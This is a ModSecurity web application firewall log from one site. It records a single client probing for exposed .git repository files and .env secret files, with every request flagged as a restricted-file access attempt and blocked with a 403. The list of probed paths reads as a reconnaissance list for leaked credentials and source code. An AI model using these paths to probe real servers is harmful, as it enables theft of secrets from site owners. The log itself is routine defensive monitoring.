[Mon May 11 20:55:56.764240 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/info"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/info"] [unique_id "agImPJYn-x0CHsbEbP2twAAAAIo"]
[Mon May 11 20:55:56.764411 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/info"] [unique_id "agImPJYn-x0CHsbEbP2twAAAAIo"]
[Mon May 11 20:55:56.764601 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/info"] [unique_id "agImPJYn-x0CHsbEbP2twAAAAIo"]
[Mon May 11 20:55:56.781972 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/packed-refs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/packed-refs"] [unique_id "agImPJYn-x0CHsbEbP2twQAAAIo"]
[Mon May 11 20:55:56.782150 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/packed-refs"] [unique_id "agImPJYn-x0CHsbEbP2twQAAAIo"]
[Mon May 11 20:55:56.782351 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/packed-refs"] [unique_id "agImPJYn-x0CHsbEbP2twQAAAIo"]
[Mon May 11 20:55:56.793446 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/fetch_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agImPCMeXtzav-mi9SyxowAAAMw"]
[Mon May 11 20:55:56.793616 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agImPCMeXtzav-mi9SyxowAAAMw"]
[Mon May 11 20:55:56.793815 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agImPCMeXtzav-mi9SyxowAAAMw"]
[Mon May 11 20:55:56.799972 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agImPJYn-x0CHsbEbP2twgAAAIo"]
[Mon May 11 20:55:56.800115 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agImPJYn-x0CHsbEbP2twgAAAIo"]
[Mon May 11 20:55:56.800290 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agImPJYn-x0CHsbEbP2twgAAAIo"]
[Mon May 11 20:55:56.806385 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/orig_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agImPNeaRXe5lR8y0ZOS2gAAAVM"]
[Mon May 11 20:55:56.806386 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImPDP5Q_-MBliRCAxnbAAAABg"]
[Mon May 11 20:55:56.806568 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agImPNeaRXe5lR8y0ZOS2gAAAVM"]
[Mon May 11 20:55:56.806568 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImPDP5Q_-MBliRCAxnbAAAABg"]
[Mon May 11 20:55:56.806755 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agImPNeaRXe5lR8y0ZOS2gAAAVM"]
[Mon May 11 20:55:56.807076 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImPDP5Q_-MBliRCAxnbAAAABg"]
[Mon May 11 20:55:56.842923 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks/post-commit"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agImPJYn-x0CHsbEbP2txAAAAIo"]
[Mon May 11 20:55:56.843089 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agImPJYn-x0CHsbEbP2txAAAAIo"]
[Mon May 11 20:55:56.843275 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agImPJYn-x0CHsbEbP2txAAAAIo"]
[Mon May 11 20:55:56.866323 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agImPCMeXtzav-mi9SyxpAAAAMw"]
[Mon May 11 20:55:56.866481 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agImPCMeXtzav-mi9SyxpAAAAMw"]
[Mon May 11 20:55:56.866654 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agImPCMeXtzav-mi9SyxpAAAAMw"]
[Mon May 11 20:55:57.558788 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/remotes/origin/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agImPVNddpkriGUb6ZV21gAAARg"]
[Mon May 11 20:55:57.559017 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agImPVNddpkriGUb6ZV21gAAARg"]
[Mon May 11 20:55:57.559290 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agImPVNddpkriGUb6ZV21gAAARg"]
[Mon May 11 20:55:57.698570 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agImPdeaRXe5lR8y0ZOS2wAAAVU"]
[Mon May 11 20:55:57.698738 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agImPdeaRXe5lR8y0ZOS2wAAAVU"]
[Mon May 11 20:55:57.698920 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agImPdeaRXe5lR8y0ZOS2wAAAVU"]
[Mon May 11 20:55:57.835809 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/pack"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/pack"] [unique_id "agImPfjVc-A-CSptvm1xgQAAAFE"]
[Mon May 11 20:55:57.835963 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/pack"] [unique_id "agImPfjVc-A-CSptvm1xgQAAAFE"]
[Mon May 11 20:55:57.836139 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/pack"] [unique_id "agImPfjVc-A-CSptvm1xgQAAAFE"]
[Mon May 11 20:55:58.001712 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agImPjP5Q_-MBliRCAxndQAAAAI"]
[Mon May 11 20:55:58.001931 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agImPjP5Q_-MBliRCAxndQAAAAI"]
[Mon May 11 20:55:58.002140 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agImPjP5Q_-MBliRCAxndQAAAAI"]
[Mon May 11 20:55:58.393301 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info"] [unique_id "agImPvjVc-A-CSptvm1xgwAAAFU"]
[Mon May 11 20:55:58.393505 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info"] [unique_id "agImPvjVc-A-CSptvm1xgwAAAFU"]
[Mon May 11 20:55:58.393707 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info"] [unique_id "agImPvjVc-A-CSptvm1xgwAAAFU"]
